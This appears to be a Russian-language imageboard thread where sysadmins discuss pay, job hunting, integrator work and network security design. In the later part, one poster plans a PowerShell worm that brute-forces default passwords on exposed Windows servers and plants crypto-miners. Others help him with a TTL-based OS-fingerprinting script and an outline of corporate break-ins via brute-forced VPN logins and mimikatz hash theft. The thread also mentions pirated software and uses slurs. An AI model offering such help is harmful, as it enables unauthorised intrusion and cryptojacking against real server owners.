Ога ога, всё так обычно и происходит. Сделал одну задачку, добрый руководитель говорит: молодец, а вот теперь держи задачу посложнее. Растёшь, умнеешь. Сделаешь ещё пару задач посложнее, тогда повысим тебя и зарплату побольше дадим.

Ответы58529

1 янв, 17:36 407 1158529

>>58496
Никто не говорит, что это быстро происходит. У меня такое обычно на второй год работы, когда я успеваю показать себя.
А если у вас тухляк (или плохой руководитель), меняйте место.

Ответы60423

1 янв, 18:01 408 1158531

>>58208

>и нашёл другую работу.

рассказал бы на что сменил.

1 янв, 20:33 409 1158540

>>58208
Поясните, кстати, за интеграстов. Они, получается, сорт оф админско-эникейный аутсорс? Ну то есть, как и обычный отдел IT-инфраструктуры, но только обслуживающий сразу несколько компаний, преимущественно по удалёнке. Есть ли у них какая-нибудь техническая документация по сетям обслуживаемых ими компаний?
Вот, к примеру, я устроюсь на должность на должность сетевика в интеграторе. Первый день. Поступает мне звонок из компании "Залуп-Продакшн", жалуются на то, что не могут связаться с их удалённой площадкой в другом городе. Я, как уже сказал, вообще первый день на работе и не ебу что там и как у этого клиента в сети устроена. Может у них там распределённая сеть на тёмном волокне и, внезапно, пошла по пизде динамическая маршрутизация, или, ну, к примеру, ещё какая-то хуйня произошла. Куда мне глядеть, чтобы хотя бы понять, откуда начать расспрашивать клиента?

Ответы58568 60428

1 янв, 20:36 410 1158541

Находил ли кто вакансии IT-поддержки в каких-нибудь НИИ или ОКБ? Именно поддержки - обычным эникеем/сисадмином/специалистом по линухам/AD/сетевиком, а не хардовым научным сотрудником? Или в такие золочёные места всё равно нужно ВО, даже если ты будешь просто картриджи менять?

Ответы60440

1 янв, 21:41 411 1158568

>>58540
Они не только обслуживают, но и проектируют/внедряют новые системы. Соответственно там можно быть проектировщиком/внедренцем/суппортом (это специализация инженера).
А еще есть пресейлы, архитекторы, ГИПы, но это уже дальше.

Ответы60440

33 Кб, 500x365

2 янв, 00:22 412 1158603

Антоны, почти два года работаю в полуайтишной компании сис. одменом эникееем по факту, наверное. Честно, уже заебало, и развития там уже почти не стало. Научился поднимать/настраивать шиндосерверы, виртуальными атсками, небольшой ремонт пекарней, подключение/настройки торгового оборудования, видеонаблюдение, даже приходилось переделывать сайтик компании, курил мануалы по js/html/css, за пару месяцев курения сделал много прикольных фич... но вот на HH в основном те же условия и та же зарплата 20-25к. Блять у меня уже отчаяние, как можно с обвалом рубля жить на такие деньги...
Что можно предпринять, куда вкатываться, что подтянуть?

Ответы58763 59057

2 янв, 19:03 413 1158763

>>58603
Если живешь в провинции и хочешь денег, то дрочи 1С. Все остальное в мухосрани нахуй не всралось никому.

Ответы58783

2 янв, 20:31 414 1158783

>>58763
Казань

3 янв, 11:48 415 1158857

Опишите типичные рабочие задачи в Мухосранском не айтишном ООО на 10 человек?

Ответы58936

3 янв, 16:43 416 1158936

>>58857

>Опишите типичные рабочие задачи в Мухосранском не айтишном ООО на 10 человек?

чинить стулья
делать кунилингус главному бухгалтеру
собирать мебель
ну ещё может быть пару раз в месяц переустановить винду

3 янв, 19:06 417 1158967

Хэлло Воркач! Где лучше искать удаленную работу админу?

Есть хороший бэкграунт энтерпрайзного говна типа сццм, гипер-в, аксапты и эксченджа. Плюс vmware вся линейка. Плюс железяки любые, могу проектировать небольшие ДЦ. Сети на уровне админа в провайдере(есть подтвержденный опыт). Ну и линукс тоже шарю, но не шибко. Хочу хотя бы $1500. Инглиш на уровне чтения любого говна(не выше).

Сейчас работаю руководителем за 150к в ДС, собираюсь свалить в Тай лет на 5.

Ответы59026 60440

3 янв, 20:38 418 1158999

Посоны, поясните кто-нибудь за философию в computer science. Услышал тут что есть прям отдельная такая дисциплина на западе, по крайней мере курс её проходят там в учебных заведениях. В чём суть?

Ответы59134

3 янв, 21:38 419 1159026

>>58967
Хер знает. То, что ты описал - вмваре, сццм и т.д.. Сети на уровне админа провайдера...это конечно все здорово, если бы ты искал работу на полный день в офис. Но как ты хочешь найти подобную работу удаленно? Из админства удаленно это только линуха и девоопсы всякие.
Или по знакомству работку кто подкинет.

3 янв, 22:09 420 1159040

>>57432
Ну Оракл по-моему только так и можно осилить, это же блядь, ёбаное тайное знание, которое из поколение в поколение передаётся и всё равно обязательная техподдержка, ибо пошёл ты нахуй, вот почему.

3 янв, 22:18 421 1159042

>>49761 (OP)

>Тасклист для Linux админа: https://www.reddit.com/r/linuxadmin/comments/2s924h/how_did_you_get_your_start/cnnw1ma

Насколько же это охуенно, хотя я чуть сознание не потерял, читая, приговаривая "ух бля" и осознавая одновременно и объём работы, и сколько всего я не знаю.
Алсо, нахуя вы себе конкурентов-то плодите, лол. Треды реально шикарные, ПРОСТО бери и делай

Ответы59216 59222

3 янв, 23:01 422 1159057

>>58603
Вкатывайся в ДС

4 янв, 11:10 423 1159134

>>58999
Думаю, всё ограничивается курсами истории развития философского мышления да детальным рассмотрением научного метода.

Ответы59290

4 янв, 16:45 424 1159216

>>59042
Виртуальная машина виртуальной машиной погоняет. Сколько же мне ОЗУ нужно для всего этого? Моя кора дуба и 4гб такого не потянут.

4 янв, 17:07 425 1159222

>>59042

>Алсо, нахуя вы себе конкурентов-то плодите, лол.

Реальные конкуренты могут вырасти только отработав пару-тройку лет на реальной работе.
Дроча виртуалки никаким админом никогда не стать.

Ответы59289

95 Кб, 1024x681

4 янв, 19:35 426 1159259

>>49761 (OP)
Иду устраиваться сис админом на завод в своей мухосрани. Знаний хуй да нихуя, хотя уверен что возьмут. Так вот, есть ли какие то тонкости о которых мне стоит знать и какую работу нужно выполнять а какую нет за 10-15 тыщ?

Ответы59260

4 янв, 19:42 427 1159260

>>59259
Смотря какие обязанности

> есть ли какие то тонкости о которых мне стоит знать

Если что то работает, не старайся с горящими глазами сделать это лучше. Иначе сломаешь, и будут на тебя говно изливать. Лучше тру изучить дело/технологию, если не совсем уверен в своих силах, а потом уже понемногу перепиливать, если захочешь.
Как правило сложные задачи появляются внезапно, изза поломки. Тут и появляется опыт

Ответы59261

4 янв, 19:45 428 1159261

>>59260
Хотел бы узнать насчет установки программ\винды, на предприятии ведь обязательно все лицензионное?

Ответы59264

4 янв, 19:47 429 1159264

>>59261
Завод государственный? Я в частной работаю, шиндовсы юзаем лицуху, все остальное либо опенсорс, либо крякнутое

Ответы59279

4 янв, 21:27 430 1159279

>>59264
Точно не знаю, вроде нет.

Ответы59304

4 янв, 22:20 431 1159289

>>59222

>Дроча виртуалки никаким админом никогда не стать.

Я именно надрачивая виртуалки пошёл работать за 50к, так и стал админом.

Ответы60440

4 янв, 22:22 432 1159290

>>59134
Не, даже беглое гугление выдаёт информацию, по которой там несколько разделов и много своих специфичных терминов. Вот и интересуюсь, есть ли тут кто-то в теме.

4 янв, 22:49 433 1159304

>>59279
По мелочи для себя на свой рабочий комп думаю похуй. А вот что ставить юзверям обговори с начальником, может он сам ссыт проверок. Моему начальнику таки похуй, он себе на комп даже попросил крякнуть шинду, что бы не тратить лицуху

Ответы59516

5 янв, 10:59 434 1159401

Вчера встретил знакомую девочку. Маникюр делает.
Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми, без учета материалов. Это в ДС, конечно.
Привет, админы, как у вас там дела? На еду-то хватает вам? Кредит выплатили уже за микроволновку?

Ответы59481 60440

5 янв, 11:01 435 1159402

Чувствую, что ещё пара годков и матери будут пугать своих детей, мол, плохо будешь учиться — станешь админом, будешь картриджи менять и винду переустанавливать. Как сегодня пугают дворником. Дворникам, кстати, в ДС 60 платят. Если пару участков лишних возьмешь, то сотку, думаю, моэжно заработать.

Ответы59482

5 янв, 12:36 436 1159425

Понимаю, что может быть не совсем тематика треда, но всё же.

Подумываю вкатиться в ремонт телефонов и около того.
Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь.
Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое.
Руки не из жопы, вроде.
Живу в ДС, так что вакансий должно быть достаточно.

Собственно, вопросы:
1) Норм-ли платят и сколько вообще там шекелей есть?
2) Насколько реально вкатиться?
3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения.
4) Хуйня или нет?

Ответы59429

5 янв, 12:46 437 1159429

>>59425

>Понимаю, что может быть не совсем тематика треда, но всё же.

>

>Подумываю вкатиться в ремонт телефонов и около того.

>Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь.

>Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое.

>Руки не из жопы, вроде.

>Живу в ДС, так что вакансий должно быть достаточно.

>

>Собственно, вопросы:

>1) Норм-ли платят и сколько вообще там шекелей есть?

>2) Насколько реально вкатиться?

>3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения.

>4) Хуйня или нет?

Ничег не хуйня, главное делай хорошо.
Можно потом подраюатывать на стороне, чинить телефоны знакомым за деньги и т.д.
По мне так нормальный вариант.

Ответы59720

5 янв, 15:52 438 1159481

>>59401
Что-то мало. Я как-то нашёл телефон потерянный, по фоткам и СМСкам понял что хозяйка ногти стригла и лакировала, при этом ходила по домам, так у неё поступления на счёт шли по 30-50 штук раз 7-9 в месяц.

Ответы59492

5 янв, 15:52 439 1159482

>>59402
Сколько видел дворников - меньше сотыги не получали.

Ответы59708

5 янв, 16:17 440 1159492

>>59481

> 30-50 штук раз 7-9 в месяц.

ну чё 300-500 тысяч. Норм з.п. для ДС. Меньше только у админов и дворников.

Ответы59637

5 янв, 17:22 441 1159516

>>59304
Значит в случае чего ебут начальство а не сис админа?

5 янв, 18:21 442 1159544

Кто что собирается делать с мелтдовеном и спектром после праздников? Или все уже экстренно обновляются?

Ответы59558 59638 59639

5 янв, 18:36 443 1159558

>>59544
Активных атак пока не было, публичных инструментов тоже не появилось. Неспешно обновлю когда всё протестируют.

Но если бы у меня было облако и я предоставлял другим сервисы, то сразу бы напрягся.

357 Кб, 535x528

5 янв, 21:46 444 1159637

>>59492

5 янв, 21:51 445 1159638

>>59544
Обновил уже.
Алсо, атака - хуйня.
В прошлый когда HeartBleed была - там тоже можно было куски памяти читать.
Причём средства были.
Ну поставил дампиться с сервера банка память на дня 3.
НИХУЯ в итоге не было в этих гигабайтах памяти. Просто НИХУЯ.

Ответы59639

85 Кб, 573x553

5 янв, 21:55 446 1159639

>>59544
>>59638

6 янв, 04:12 447 1159708

>>59482
Активно общаешься с дворниками?

Ответы59729

6 янв, 08:44 448 1159714

Мамашу создателя баша, в театр водил. Какие же это старые костыли.

6 янв, 10:31 449 1159720

>>59429

Спасибо за совет!

А есть кто-то работавший в этой сфере?

6 янв, 11:28 450 1159729

>>59708
Да, планирую перекатываться с админа, вот и разведываю обстановку.

7 янв, 13:37 451 1160023

>>50138

>Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)

>Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями

В абсолютно любом нормальном энтерпрайзе. Вообще, SLA и ITIL не просто красивые слова, вот это вот всё реально охуенно работает.

Ответы60027

7 янв, 13:40 452 1160027

>>60023

>В абсолютно любом нормальном энтерпрайзе

Это какой же величины должен быть энтерпрайз? Банк топ-3?

Ответы60051

7 янв, 13:54 453 1160044

>>51529
>>51538
>>51566
>>51965
>>52301
>>52549
>>52745

>На каникулах уже покопаюсь.

Так вот, только что покопался. Ничего не перебито, только между разъемом ATX и фишкой фена №1 зажали пару толстых проводов от питания бэкплейна. Фишка встала криво, контакт термодатчика как раз не контачит. Так что с диагнозом угадал. Надо будет теперь пачку стяжек заказать завхозу, да переложить все.
Пишу просто чтоб закрыть вопрос.

7 янв, 14:02 454 1160051

>>60027

>Это какой же величины должен быть энтерпрайз? Банк топ-3?

Практически любой. Самое главное - общая концепция, она масштабируемая.

Ответы60105

7 янв, 16:54 455 1160105

>>60051

>Практически любой. Самое главное - общая концепция, она масштабируемая.

ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.

Ответы60183

7 янв, 19:28 456 1160183

>>60105

>ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.

Как-минимум первую-вторую линию поддержки обеспечить можно. Возможно человек на второй линии и не будет заниматься только дизайном, но уж точно он не должен делать простейшую работу и не должен контактировать с пользователя напрямую.

8 янв, 14:27 457 1160423

>>58529

8 янв, 14:39 458 1160428

>>58540

>админско-эникейный аутсорс

да, как обычный ойти отдел, только сразу на дохуя инфраструктур. к вопросу откуда брать знания - как правило, когда проект уже передан на поддержку, то есть хоть какая-то документация.

>чтобы хотя бы понять, откуда начать расспрашивать клиента

заняться хоть какой-то диагностикой. связаться с заказчиком, поебать ему мозги, назадавать кучу вопросов. есть масса способов потянуть время, пока въезжаешь что да как. в целом, это всё-таки ойти организация, и ситуации вида "пришёл на работу нуб, затупил, и у клиента всё пиздец стало раком" возникают достаточно редко. поначалу точно будут помогать.

очень много зависит от умения общаться с людьми и убеждать их. я бы сказал, что это значит много больше, чем фактический уровень владения внедряемыми продуктами и технологиями. люди, которые одновременно умеют хорошо пиздеть и хорошо внедрять-саппортить-траблешутить, наиболее ценятся в таких конторах, у них больше всего зарплата и им меньше всего ебут мозг.

8 янв, 14:58 459 1160440

>>58541
Бывают такие. В/о вряд ли требуется. Приобретёшь бесценный опыт починки экзотического ПО и/или оборудования. То есть проебёшь несколько лет впустую.

>>58568

>пресейлы, архитекторы, ГИПы

По нынешним временам это скорее не позиции, а роли. Т.е. на одном проекте ты гип, на другом орхитектор, на третьем консультант, на четвёртом саппортишь иногда. Так гораздо дешевле, чем держать отдельных "архитекторов" и гипов. Так не везде, но уже много где.

>>58967
Варианты бывают, но редко. Видел где-то год назад вакансию удалённого одмена со всем, чем ты перечислил, но за 800 бачей.

>>59289

>Я именно надрачивая виртуалки пошёл работать за 50к

Речь идёт о том, что админ, всего лишь подрочивший виртуалки и поустанавливавший на них жмупинус, не составит реальной конкуренции инженеру с многолетним опытом.

>>59401

>Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми

Элементарная ложь, что я могу сказать

Ответы60453

8 янв, 15:24 460 1160453

>>60440

>Бывают такие. В/о вряд ли требуется.

Во все стратегические ОКБ ДС и ДС-2 требуется.

>>60440

>Элементарная ложь, что я могу сказать

Не факт. У нормального мастера сеанс вполне может стоить от 3к рубасов.

Ответы60478

8 янв, 16:21 461 1160478

>>60453
Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких.

Ответы60597 60606

9 янв, 08:11 462 1160597

>>60478

>Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких.

Кстати, барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют.

Ответы60606

9 янв, 08:41 463 1160606

>>60478
Пиздишь, как дышишь, жена ходит в салон каждую неделю по 2 раза. Стоит маникюр 1к рублей. Если, вдруг, давно не делала или есть серьезно поломанные ногти - 2-2,5к за сеанс. Да, есть салоны, где берут в 2-3 больше - туда тоже пробовала ходить, но... разницы в результате нет никакой, лол. А фантастические зарплаты маникюрш в декабре - это норма, т.к. перед праздниками они работают 24/7 - спрос колоссальный же.

>>60597

>барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют.

Ну так и парикмахеры тоже. Сложная женская стрижка с окраской омбре может доходить до 30к рублей... и ее еще надо каждые ~2 недели подкрашивать и подравнивать, что тоже стоит по 3-5к рублей. Пришел, отдал 25к разом и сразу записался на 10 дней вперед еще на 5к.

Ответы60650 60654

43 Кб, 480x480

9 янв, 09:18 464 1160611

>>25159679

Люто двачую, я в те годы играл в новейший КС сорс, и в буквальном смысле карал всех с калаша с счётом 30-3 или 35-4, а сейчас дай бог убивать не 1 к 1, ещё я тогда дохуя играл в ла2, и мог за ТХ нагнуть целую консту, скидывал паровоз и добивал выживших, сейчас я бы хуёв пососал. С годами реакция притупляется, правильно говорят, что пиздюком время идёт долго, поэтому ты успеваешь замечать и реагировать на малейшие изменения

Ответы60612

9 янв, 09:21 465 1160612

>>60611
Миснул мимо /vg/, сорян, парни

9 янв, 12:26 466 1160650

>>60606
Ну так я и говорю, админам далеко до парикмахерш с тремя классами образования.

9 янв, 12:48 467 1160654

>>60606

>Ну так и парикмахеры тоже

У меня есть парикмахер - чурка, приехал из аула, но стрижёт как бог, лучше чем он, меня только стригла знакомая стилистка с рашитудей, но у неё пиздец график, что хуй попадёшь. Я этому парнише каждый раз даю на чай 300-500р от настроения, и буду платить почти любые деньги до 2к рублей, что бы стричься у него дальше

9 янв, 12:51 468 1160655

Админы, думал об очередном майнер-вирусе на powershell, и тут задумался, а как через powershell удалённо можно понять какой перед тобой узел: linux, windows, cisco, мне бы точнее вытащить из всего только windows, так как powershell
Даже если ты попал на какой-то открытый сервак с SAMBA, ты получишь рабочие 445 и 137-139 порты, но это не значит, что перед тобой windows и можно перебирать пароли по циклу

Ответы60659

9 янв, 13:04 469 1160659

>>60655
Проверки ttl вкупе с 139 портом для твоих целей хватит более чем.

Ответы60663

9 янв, 13:18 470 1160663

>>60659

>ttl

Cisco TTL > равен 255
ttl windows > равен 128
Unix ttl > равен 64
Android и IOS Apple> 65
Lumia > 130

Погуглил, а ты прав, хорошая мысль, не знал, что у них разны ttl

Ответы60669

9 янв, 13:28 471 1160669

>>60663
В детстве во дворе вы в хакеров не играли что-ли?! Олсо ttl можно поменять локально, но ни разу не видел, чтобы так делали, всё равно nmap не обманешь - он более сложные сигнатуры использует. Олсо 127, очевидно, тоже будет винда, просто за роутером.

Ответы60672

9 янв, 13:41 472 1160672

>>60669
Надо подумать как его в powershell засунуть
У него ведь нету утилиты командной строки? Не юзал его, ща попробую

Ответы60680

9 янв, 13:58 473 1160680

>>60672
Я догадывался, что это можно сделать через Test-Connection, но без гугла и без винды под рукой сам бы не сообразил как:

$ComputerName = "computerName"
$TimeToLive = Test-Connection $ComputerName -Count 1 | select -exp ResponseTimeToLive

Switch($TimeToLive)
{
{$_ -le 64} {"Linux"; break}
{$_ -le 128} {"Windows"; break}
{$_ -le 255} {"UNIX"; break}
}

Ответы60685

9 янв, 14:07 474 1160685

>>60680
Да, надо протестить, интересная мысль, и ещё впихнуть туда доступность портов, так как без SMB всё равно хуй там плавал

Ответы60687

9 янв, 14:09 475 1160687

>>60685
А что за извращение писать на повершел такое? Аргументы против:
- по умолчанию мало где установлен - только в 8, 8.1 и 10, т.е. 7-ка мимо, а 90% корпоратива до сих пор на ней сидит.
- ps ранних версий не полностью совместим с 5.1, при этом в 8-ке стоит 3.0, в 8.1 - 4.0, в 10 - 5.1, т.е. тебе надо всё писать на 3.0, чтобы наверняка "везде" заработало.

Олсо сам майнинг всё равно ведь будет через payload, а на ps только сам червь? Я, правда, ХЗ на чем там сейчас червей под винду пишут...

Ответы60702

9 янв, 14:43 476 1160702

>>60687
Ну поэтому и был план на повершелле, что бы просто циклом перебрать стандартные логины и пароли, и найти хосты на винде
От повершелла я хочу - найти туда куда можно сделать подключение, запустить его через VPN или TOR и пусть себе сканирует подсети на всякие admin/admin, или на SMB без пароля, а там уже дальше будем плясать от полученной информации

Вообще, так-то да, можно ещё на баше написать чтобы чекал открытый 22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен

Первоочередной целью ставлю просто облачные серваки, на которые админы любят заливать бекап и забывать о их существовании на многие годы, ломать целые корп сети - безумие

Мне кажется все вирусы пишут на питоне, так как на питоне можно написать всё, что угодно, а на с++ написать сам питон

Ответы60767 60769 60778

9 янв, 16:19 477 1160767

>>60702

>22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен

У меня обычно ssh на нестандартном порту + fail2ban + отключена авторизация по паролю, только по ключам. Если на сервер хожу только я, то еще port knocking настраиваю. И вроде норм все.

Ответы60771 60776

9 янв, 16:19 478 1160769

>>60702
Подобный червь должен иметь управляющий сервер, куда он будет сгружать всё, что нашел интересного, ну или что успел намайнить. Так что итоговая реализация не такая то и простая будет, потому что управляющие сессии находят и режут абсолютно все системы безопасности, основанные на анализе активности сети/приложений (т.е. и локальные касперские, и фаерволы на границе сети).

>вирусы пишут на питоне

Вредонос пишется на том, что может быть исполнено на атакуемой системе. Так как 99% атакуемых систем под виндой, где питона по умолчанию нет, то и писать на нем зловред бессмысленно. Всякие py2exe, конечно, есть, но не проще-ли сразу писать на сях/асме с применением winAPI? На пайтоне разве что реализуют эксполиты, но их и на всём подряд пишут, от си и баша, до перла и пхп.

>Первоочередной целью ставлю просто облачные серваки

А как ты хочешь заставить эти серваки выполнять свой код? У тебя какой-то эксплоит уже припасен для этого? Просто подобрать логин/пароль к файловому серверу еще недостаточно... особенно в доменной сети, где на несколько тысяч учетных записей только несколько обладают нужными правами и к ним то как правило пароль брутом не подобрать никак...

Ответы60776

9 янв, 16:21 479 1160771

>>60767
А в чем смысл fail2ban, если авторизация только по ключу? Олсо нестанадратный порт тут как бы тоже ни к чему - всё равно найдут и всё равно не подключатся никогда. Лучше уж сделать фильтрацию по доверенным подсетям или вообще только через vpn ходить во внутренние сети.

Ответы60775 60776

9 янв, 16:31 480 1160775

>>60771
Просто перестраховка, лол. А фильтрацию по доверенным подсетям не всегда есть возможность сделать, с VPN тоже самое.

Ответы60777 60778

9 янв, 16:33 481 1160776

>>60771

>fail2ban

Я думаю цель, в том, чтобы не создавать флуда, если у тебя есть какой-то виндовый сервак смотрящий в интернет попробуй посмотреть сколько туда подключается каждую секунду

>>60767
Верно у меня также, хотя и нету бана за фейлы, и вообще закрыт любой SSH на внешний интерфейс, только изнутри и ВПН

>>60769
Тоже верно, мне интересно просто побрутить и покидать майнеры в автозагрузку

Да, про язык ты прав, в любом случае у меня в планах просто повершелл

Я пока хотел просто подкинуть файл и всё, в домены лезть - себе дороже, если найдут, то посадят на бутылку

Парни ещё раз, атака только на внешние вин сервера где можно набрутить пароль, успокойтесь, хацкеры

Кстати, если память не изменяет, то в домене обычно забирают хэши паролей, и по радужным картам ищут соответствие. Хотя опять же в какой сегмент попадёшь, ну а может дальше линёвого сервера и не уедешь

Ответы60792

9 янв, 16:34 482 1160777

>>60775

>с VPN тоже самое

Да ладно, тут я не согласен опенвпн сервер можно поднять минут за 5 и всё затолкать в 443 порт

Ответы60780

9 янв, 16:34 483 1160778

>>60702

>root логон совсем у аутистов будет включен

Ага, он уже давно по умолчанию в конфиге sshd выключен.

>ломать целые корп сети - безумие

Внезапно, нет! Ты ведь заранее никогда не знаешь что за каждым конкретным IP-шником... и шанс, что там дырявый корпоративный сервак торчит наружу всегда есть. Собственно, именно так и ломают корпоративные сети: берешь интересные тебе AS-ки и долбишь их во все щели... Если это таргетированная атака, то, конечно, долбишь как можно нежнее, но суть всё равно та же - найти косяки в конфигурации сервисов или непропатченные сервисы. А вот через web корпорат и правда почти не сломать - публичные сайты хостятся отдельно от внутренней инфры. Во-первых, чтобы дос сайта не влиял на доступность инфры, во-вторых, чтобы сложнее было найти точки входа в саму инфру (не у всех же своя AS), ну и еще потому что веб куда более дырявый - потерять корпоративный сайт на пару дней не так страшно, как пустить взломщиков внутрь основной инфры.

>>60775
Впн через SSL как раз всегда можно сделать и работать будет везде, т.к. закрыть SSL сегодня == закрыть весь инет. Фильтрация по адресам хорошо работает, если ты получаешь доступ к ресурсу из счетного числа мест, например, с работы и из дома. Если надо зайти из другого места - всегда можно пройти через дом/работу.

Ответы60780 60782

9 янв, 16:39 484 1160780

>>60777
>>60778
Есть такие погромисты на похапэ, которым сложно настроить VPN-клиент. Если настраиваешь VPSку таким кадрам, то делать что-то лишнее себе дороже.

Ответы60783

9 янв, 16:40 485 1160782

>>60778

>Ага, он уже давно по умолчанию в конфиге sshd выключен.

можно вместо рута брать admin admin1 administrator adm и прочие вариации

>публичные сайты хостятся отдельно от внутренней инфры

Это опять же всё от аутиста админа зависит, ДМЗ не всегда делается, а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть, при том не всегда для сервера, а иногда для какого-то видео регистратора или подобного китайского скама.
Да, тут надо найти точку входа

>>60778

>Впн через SS

ну опенвпн юзает, какой там 1194 порт, по дефолту, вроде, я писал выше про 443, но казахстан уже пытался

Ответы60792 60897

9 янв, 16:42 486 1160783

>>60780
Братишка, я тоже тупой, но опенвпн реально совсем просто:
10 команд и скопировать строки в конфиг, поменяв ИП адрес, даже на винде можешь сделать сервер

Ответы60786

9 янв, 16:45 487 1160786

>>60783
Я в курсе, лол. Но рассказывать об этом каждому встречному у меня уже нет желания.

9 янв, 16:53 488 1160792

>>60776

>сколько туда подключается каждую секунду

Посмотрел
$ journalctl -xb | grep "sshd.Failed password" | wc -l
343

Это за сегодня. Не очень то и много. Большая часть ломится с логином root, лол.

>в домене обычно забирают хэши паролей

Сперва добывают именя пользователей. Это изи, т.к. логины почти всегда совпадают с почтой, которая весьма активно светится в инете на том же корпоративном сайте. Также можно быть уверенным, что у большинства топчиков и всяких важных шишек есть доступ к корпоративному vpn, который тоже реально найти. Дальше брутят пароли - у многих пользователей они весьма брутабельные. Дальше проникают в сеть, потом на машину пользователя. А там уже ловят админские хеши (а то и сами пароли, если винда старая) через mimikatz, потом брутят их. Это как один из векторов, связанный чисто с брутом логинов/паролей.

>>60782
>найти точку входа

HINT: dig .corp.ru MX

>проброс портов во внутреннюю сеть для регистратора

Ну такой дичи в энтрепрайзе обычно не встретить. Разве что службы безопасности нет совсем (только тогда какой же это, блядь, энтерпрайз?) или админ отмороженный настолько, что у них под носом сделал подобное, не отдавая себе отчета, что это почти что уже статья - умышленное создание бекдора, корпоративный шпионаж и т.д. и т.п. - безопасники 100% найдут у такого админа яйцо на которое можно наступить...

Ответы60794 60813

9 янв, 16:54 489 1160794

Потрясная разметка вышла. Прошу прощения.
>>60792-_-

9 янв, 17:32 490 1160813

>>60792

>Ну такой дичи в энтрепрайзе обычно не встретить

Зря ты так думаешь, в любой деревенской конторе до 100 человек с бюджетом на ИТ в виде двух эникеев, а такое даже в ДС часто встречается в ГОСах или просто всяких непонятных строительных/магазинчиках конторах
Я знал проектный институт, где директор сказал, что он ХОЧЕТ чтобы он смотрел камеры своего кабинета из телефона, и глупый дед-эникей просто сделал маппинг

>HINT: dig .corp.ru MX

А если это мелкая контора с почтой на яндексе:
mx.yandex.net. 35 IN A 77.88.21.89
Ну так-то да, мейл-ексчейнджер у крупной конторы будет светиться

Ответы61018

9 янв, 19:59 491 1160875

И вот этот прекрасный момент, я стал суппортом вендора, вместо суппорта заказчика. Теперь меня трахаю в жёппу по миллион раз на день, обзывают пидорасом, причём в открытую и усмехаются в ебало. Ведь я теперь мусор, не человек.

Ответы60884 61021

9 янв, 20:30 492 1160884

>>60875
Зачем твой вендор продаёт такое говно?

Ответы61006

9 янв, 21:33 493 1160897

>>60782

>а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть

А как быть если нужен клиентский vpn, для доступа к внутренней сети? И он поднят средствами серверными, тем же openvpn. Без проброса порта или выделения внешнего адреса машине с адресом внутренним не сделать такого.

Ответы61017 61020

10 янв, 05:05 494 1161006

>>60884

Потому что заказчик платит невъебенные бабки.

10 янв, 07:42 495 1161017

>>60897
Проброс не есть плохо, но делать надо в дмз, а не во внутрянку.

Ответы61074 61075

10 янв, 07:46 496 1161018

>>60813
100 человек - это не тыпрайз ни разу, а мелкий, средний бизнес. Госы, кстати, тоже разные бывают, в крупных обычно всё интеграторы делают, а не местные админы.

Ответы61036

10 янв, 07:48 497 1161020

>>60897
Представь свои чувства, когда купил последний айфон официально за 120к, а он не включился и аппл пожимает плечами и обещает что-то исправить в ближайшее время...

Ответы61021

10 янв, 07:51 498 1161021

>>60875
это >>61020 было тебе, конечно...

10 янв, 09:18 499 1161036

>>61018

>в крупных

Я тебе говорю про 100-500 человек ГОС, а в госах в 10к человек там обычно всё хорошо

10 янв, 10:36 500 1161074

>>61017
Ну так из дмз доступ же не получить к внутренней сети, а от клиентского впн именно это и нужно.

Ответы61075 61086

10 янв, 10:40 501 1161075

>>61017
>>61074
Я вам больше скажу, принято организовывать ДМЗ через реверс прокси, каждый сервер из ДМЗ закидывать в свой сегмент сети, чтобы он не имел доступа к соседним серверам, и высшей степенью паранойи является ВПН из каждого конкретного сервера ДМЗ до локальной сети, то есть доступ из ДМЗ в локальную сеть, а из локальной в ДМЗ только через ещё одну отдельную сеть, но это топ кек, конечно же

Ответы61086

97 Кб, 1280x720

10 янв, 11:16 502 1161086

>>61074

>из дмз доступ же не получить к внутренней сети

Я имею в виду под дмз ту зону, где находятся рабочие терминальные сервера, например. Т.е. по впн ты можешь на них зайти, но не можешь зайти в локалку по этому же впн. Точно также из локалки можно попасть на те же терминальные сервера, но не во внешнюю сеть, которая за дмз. Интернет, если он нужен, где-то сбоку на локальной машине пользователя, на терминальных серверах, его, конечно, нет. И это как бы единственно корректная архитектура с точки зрения безопасности.

Вариант же, где по впн мы попадаем внутрь всей сети и имеет доступ ко всему на свете, выше уже писал чем может закончиться - найдут пользователя с плохим паролем (в большой конторе это не сложно), найдут впн сервер (его тоже особо то и не спрячешь) и всё пикрелейтид...

>>61075
